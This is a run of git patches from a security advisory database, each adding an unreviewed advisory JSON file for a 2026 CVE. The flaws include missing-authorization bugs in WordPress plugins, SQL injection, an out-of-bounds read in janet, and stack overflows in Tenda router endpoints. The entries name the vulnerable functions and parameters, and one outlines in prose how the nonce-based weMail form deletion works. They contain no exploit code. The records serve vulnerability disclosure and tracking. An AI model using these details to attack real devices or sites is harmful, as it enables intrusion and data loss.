are unavailable. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2864" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/38" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/38#issue-3915113401" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347103" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347103" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754557" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T08:16:12Z" + } +} \ No newline at end of file From b81a27c63d559f7ca88122bf97ed2e241ba0abbe Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 12:31:44 +0000 Subject: [PATCH 36/77] Publish Advisories GHSA-vjr6-wpqm-j5fj GHSA-whp7-fpv9-q2pq --- .../GHSA-vjr6-wpqm-j5fj.json | 44 ++++++++++++++++ .../GHSA-whp7-fpv9-q2pq.json | 52 +++++++++++++++++++ 2 files changed, 96 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json diff --git a/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json new file mode 100644 index 0000000000000..f27c8ffd51e51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjr6-wpqm-j5fj", + "modified": "2026-02-21T12:30:26Z", + "published": "2026-02-21T12:30:26Z", + "aliases": [ + "CVE-2026-1787" + ], + "details": "The LearnPress Export Import – WordPress extension for LearnPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_migrated_data' function in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to delete course that have been migrated from Tutor LMS. The Tutor LMS plugin must be installed and activated in order to exploit the vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1787" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/learnpress-import-export/tags/4.1.0/inc/Migration/Controllers/TutorMigrationController.php#L55" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458589" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7bde915d-092a-452b-a0e0-ce5c2ce203dc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T11:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json new file mode 100644 index 0000000000000..22dc6936280a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whp7-fpv9-q2pq", + "modified": "2026-02-21T12:30:26Z", + "published": "2026-02-21T12:30:26Z", + "aliases": [ + "CVE-2025-14339" + ], + "details": "The weMail - Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation plugin for WordPress is vulnerable to unauthorized form deletion in all versions up to, and including, 2.0.7. This is due to the `Forms::permission()` callback only validating the `X-WP-Nonce` header without checking user capabilities. Since the REST nonce is exposed to unauthenticated visitors via the `weMail` JavaScript object on pages with weMail forms, any unauthenticated user can permanently delete all weMail forms by extracting the nonce from the page source and sending a DELETE request to the forms endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14339" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/FrontEnd/Scripts.php#L32" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L124" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L222" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3442404%40wemail%2Ftrunk&old=3423372%40wemail%2Ftrunk&sfp_email=&sfph_mail=#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16dd90c3-3962-4c8e-993f-b6824c48ab76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T10:16:11Z" + } +} \ No newline at end of file From 44095bdc302bda07549179ac15e75894e3169a5e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 15:32:46 +0000 Subject: [PATCH 37/77] Publish Advisories GHSA-925f-q35m-63gx GHSA-f72j-hx3j-hhxx GHSA-wpqj-9q8f-r6hc --- .../GHSA-925f-q35m-63gx.json | 68 +++++++++++++++++++ .../GHSA-f72j-hx3j-hhxx.json | 56 +++++++++++++++ .../GHSA-wpqj-9q8f-r6hc.json | 56 +++++++++++++++ 3 files changed, 180 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json diff --git a/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json b/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json new file mode 100644 index 0000000000000..a17493738d29e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-925f-q35m-63gx", + "modified": "2026-02-21T15:31:33Z", + "published": "2026-02-21T15:31:33Z", + "aliases": [ + "CVE-2026-2869" + ], + "details": "A vulnerability was identified in janet-lang janet up to 1.40.1. Affected by this vulnerability is the function janetc_varset of the file src/core/specials.c of the component handleattr Handler. The manipulation leads to out-of-bounds read. The attack can only be performed from a local environment. The exploit is publicly available and might be used. Upgrading to version 1.41.0 addresses this issue. The identifier of the patch is 2fabc80151a2b8834ee59cda8a70453f848b40e5. The affected component should be upgraded.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2869" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/issues/1699" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/commit/2fabc80151a2b8834ee59cda8a70453f848b40e5" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/releases/tag/v1.41.0" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0123/blob/main/ja1/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347106" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347106" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754589" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T15:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json b/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json new file mode 100644 index 0000000000000..bf51751b3a5df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f72j-hx3j-hhxx", + "modified": "2026-02-21T15:31:33Z", + "published": "2026-02-21T15:31:33Z", + "aliases": [ + "CVE-2026-2867" + ], + "details": "A vulnerability was determined in itsourcecode Vehicle Management System 1.0. Affected is an unknown function of the file /billaction.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2867" + }, + { + "type": "WEB", + "url": "https://github.com/wan1yan/cve/issues/4" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347105" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347105" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754578" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T14:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json new file mode 100644 index 0000000000000..18e5ff273bdf6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpqj-9q8f-r6hc", + "modified": "2026-02-21T15:31:34Z", + "published": "2026-02-21T15:31:34Z", + "aliases": [ + "CVE-2026-2870" + ], + "details": "A security flaw has been discovered in Tenda A21 1.0.0.0. Affected by this issue is the function set_qosMib_list of the file /goform/formSetQosBand. The manipulation of the argument list results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2870" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754627" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T15:15:59Z" + } +} \ No newline at end of file From 30c32764cbeae52175a6e0c9fe152ab3bee65129 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 18:32:29 +0000 Subject: [PATCH 38/77] Publish Advisories GHSA-2j3g-5jhm-r285 GHSA-6238-4w9x-vrrr GHSA-73gf-5w78-3r4q GHSA-mq2p-gcxf-x8gf GHSA-pg46-g938-p94j --- .../GHSA-2j3g-5jhm-r285.json | 56 +++++++++++++++++ .../GHSA-6238-4w9x-vrrr.json | 56 +++++++++++++++++ .../GHSA-73gf-5w78-3r4q.json | 60 +++++++++++++++++++ .../GHSA-mq2p-gcxf-x8gf.json | 56 +++++++++++++++++ .../GHSA-pg46-g938-p94j.json | 56 +++++++++++++++++ 5 files changed, 284 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json diff --git a/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json b/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json new file mode 100644 index 0000000000000..d479a73078c10 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2j3g-5jhm-r285/GHSA-2j3g-5jhm-r285.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j3g-5jhm-r285", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2872" + ], + "details": "A security vulnerability has been detected in Tenda A21 1.0.0.0. This vulnerability affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. Such manipulation of the argument devName/mac leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2872" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347109" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347109" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754634" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json b/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json new file mode 100644 index 0000000000000..cffa1ae108560 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6238-4w9x-vrrr/GHSA-6238-4w9x-vrrr.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6238-4w9x-vrrr", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2873" + ], + "details": "A vulnerability was detected in Tenda A21 1.0.0.0. This issue affects the function setSchedWifi of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2873" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347110" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347110" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754635" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json b/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json new file mode 100644 index 0000000000000..65b739ed468eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-73gf-5w78-3r4q/GHSA-73gf-5w78-3r4q.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73gf-5w78-3r4q", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2871" + ], + "details": "A weakness has been identified in Tenda A21 1.0.0.0. This affects the function fromSetIpMacBind of the file /goform/SetIpMacBind. This manipulation of the argument list causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2871" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/2" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754630" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754631" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json b/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json new file mode 100644 index 0000000000000..5deac4e56cbf7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mq2p-gcxf-x8gf/GHSA-mq2p-gcxf-x8gf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq2p-gcxf-x8gf", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2874" + ], + "details": "A flaw has been found in Tenda A21 1.0.0.0. Impacted is the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set. Executing a manipulation of the argument ssid can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2874" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347111" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347111" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754636" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T18:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json new file mode 100644 index 0000000000000..ef2f9d32c8a66 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg46-g938-p94j", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2876" + ], + "details": "A vulnerability was determined in Tenda A18 15.13.07.13. This affects the function parse_macfilter_rule of the file /goform/setBlackRule. This manipulation of the argument deviceList causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2876" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/38" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754675" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T18:16:00Z" + } +} \ No newline at end of file From 6fbb688fbbcc7274abcf92e1308cf4e36547412d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 21:31:46 +0000 Subject: [PATCH 39/77] Publish Advisories GHSA-69vg-2v33-6p2v GHSA-7597-723j-pwr9 GHSA-9j32-rfj4-grgw GHSA-mr72-9cxv-g662 GHSA-q2r4-399v-qv3c GHSA-v43p-pv9w-gqmf GHSA-vgp4-r46f-r9x7 GHSA-w4gp-396m-45pm --- .../GHSA-69vg-2v33-6p2v.json | 56 +++++++++++++++ .../GHSA-7597-723j-pwr9.json | 56 +++++++++++++++ .../GHSA-9j32-rfj4-grgw.json | 56 +++++++++++++++ .../GHSA-mr72-9cxv-g662.json | 56 +++++++++++++++ .../GHSA-q2r4-399v-qv3c.json | 56 +++++++++++++++ .../GHSA-v43p-pv9w-gqmf.json | 72 +++++++++++++++++++ .../GHSA-vgp4-r46f-r9x7.json | 56 +++++++++++++++ .../GHSA-w4gp-396m-45pm.json | 56 +++++++++++++++ 8 files changed, 464 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7597-723j-pwr9/GHSA-7597-723j-pwr9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9j32-rfj4-grgw/GHSA-9j32-rfj4-grgw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mr72-9cxv-g662/GHSA-mr72-9cxv-g662.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json diff --git a/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json b/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json new file mode 100644 index 0000000000000..2658979a752e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-69vg-2v33-6p2v/GHSA-69vg-2v33-6p2v.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-69vg-2v33-6p2v", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2877" + ], + "details": "A vulnerability has been found in Tenda A18 15.13.07.13. This affects the function strcpy of the file /goform/WifiExtraSet of the component Httpd Service. The manipulation of the argument wpapsk_crypto5g leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + 